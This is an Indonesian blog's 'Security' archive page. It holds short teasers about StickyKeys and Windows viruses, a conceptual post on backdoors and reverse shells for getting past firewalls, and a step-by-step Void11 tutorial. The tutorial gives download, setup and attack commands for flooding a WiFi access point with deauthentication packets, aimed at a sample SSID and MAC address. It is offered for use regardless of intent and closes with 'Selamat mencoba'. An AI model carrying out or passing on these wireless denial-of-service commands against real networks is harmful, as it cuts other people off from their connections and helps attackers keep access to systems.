Arsip

Archive for the ‘Security’ Category

StickyKeys for sticky situations

Pengguna Windows mungkin mengenal StickyKeys, suatu fitur accessibility yang kadang menyebalkan bagi yang tidak membutuhkannya, karena sering tidak sengaja terpanggil ketika kita menekan tombol Shift lima kali berturut-turut. Namun selain menyebalkan, fitur ini juga ternyata menjadi salah satu titik lemah sistem operasi Windows, sekaligus bisa berguna dalam situasi terdesak. Bagaimana bisa?  Baca selanjutnya…

Iklan

Rahasia besar: Windows bebas virus?

Sebelumnya, virus di sini merupakan generalisasi — mengacu pada virus, worm, maupun program lain yang merusak.

Akhirnya merasa terdorong untuk membeberkan rahasia membuat OS Windows bebas virus. Tentunya karena OS ini bersifat closed source, maka saya tidak dapat menjamin bebas virus 100%. Namun sebagai perbandingan saya beritahukan bahwa di notebook bermerk Toshiba tipe Satellite A105 S4014 milik saya tidak diinstal antivirus apa pun, dan hingga kini aman-aman saja 😀

Untuk dapat membuat Windows “kebal” virus, pertama kita perlu tahu, bagaimana sih virus menyerang? Baca selanjutnya…

Kategori:Security Tag:, ,

Backdooring

September 14, 2008 Tinggalkan komentar

Nah ketemu lagi dgn topik ttg network security. Sekarang kita akan bahas tentang Backdooring. Pastinya kebayang donk maksudnya apa. Ibarat maling kalo berhasil masuk rumah korban pastinya klo ntar2 dia mw masuk lagi g mungkin donk lewat jalan yg sama (yg biasanya sih lbh susah). Pastinya dia siapin entah gimana caranya jalan lain yg spy dia gmpang masuk lagi, ex : lwt bawah tanah, atap atw gemboknya dirusak sm dia. Nah analogi ini sm juga dgn cara attacker utk menembus sistem yg sdh pernah berhasil dia lumpuhkan.

Jenis-jenis backdoor sendiri ad banyak macemnya. Contohnya kyk :
1. Program yg diinstall sm attacker -> back orifice, sshv4
2. Program/file yg dimodifikasi -> OpenSSH backdoor
3. Plugins -> cgi-telnet, php shell
4. Program binary yg dieksekusi -> bindshell

Untuk kali ini, saya akan ngebahas sedikit tentang salah satu teknik dalam backdooring, namanya Reverse Shell. Jadi nih teknik sebenarnya digunakan klo kita ketemu dg firewall yg dikonfigurasi dgn “full restriction inbound traffic”. Maksudnya adalah si firewall ini akan memfilter segala macam paket/koneksi dr luar yg ingin masuk ke dlm dengan ACL (Access Control List) yg sdh disetting sebelumnya. Namun tdk sebaliknya, koneksi dr dalam keluar tidak difilter sm si bang firewall ini 😀 (hohoho).

Ini ilustrasinya :

Di sini attacker memasang reverse shell backdoor di komputer server setelah berhasil melakukan koneksi melalui port 80 (HTTP)

 

Kemudian si attacker mengeksekusi reverse shell backdoor di mesin target n terjadilah koneksi dari dalam ke luar…

Yup segitu aja dulu corat-coret dr saya. Tunggu tulisan2 berikutnya yg dijamin lbh menarik :D.

CU !

Kategori:Hacking, Security

Melumpuhkan Access Point dg Void11…

September 5, 2008 1 komentar

Yups, bagi yg seneng dg dunia security, apapun status kamu (Black atau White Hat :p), saya mw sedikit mengenalkan salah satu aplikasi yg dpt melakukan mass flooding utk Access Point (DoS) : Void11.

Void11 memiliki beberapa jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan ‘deauthentication packets’ sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan ‘authentication packets (random client MACs)’

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)

Nah, tadi kan teorinya, sekarang waktunya untuk berkotor-kotor ria!
Apa aja yg perlu disiapkan?
– komputer atw laptop yang udah ada wificard dengan chipset Prism.
– Wardriving utk mendapatkan MAC Address + SSID AP si target
– Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2

Nah ini konfigurasinya :

cd /tools/wifi/void11-0.2.0/console
iwconfig wlan0 mode master
iwpriv wlan0 hostapd 1
./void11_hopper

alternatif void_hopper mode juga bisa menggunakan :
iwconfig wlan0 channel 6 (set card to channel 6)


Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]


Penyerangan :

Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving…untuk hal ini bisa pakai “kismet”
Dari hasil wardriving didapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35


Siapakan penyerangan sbb :

void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35

And, where we go…!!  AP-nya nge-drop. :D. Cukup simpel kan!?

Btw, saya tdk bertanggung jawab ya atas akibat yg ditimbulkan dr tutorial ini.

Selamat mencoba…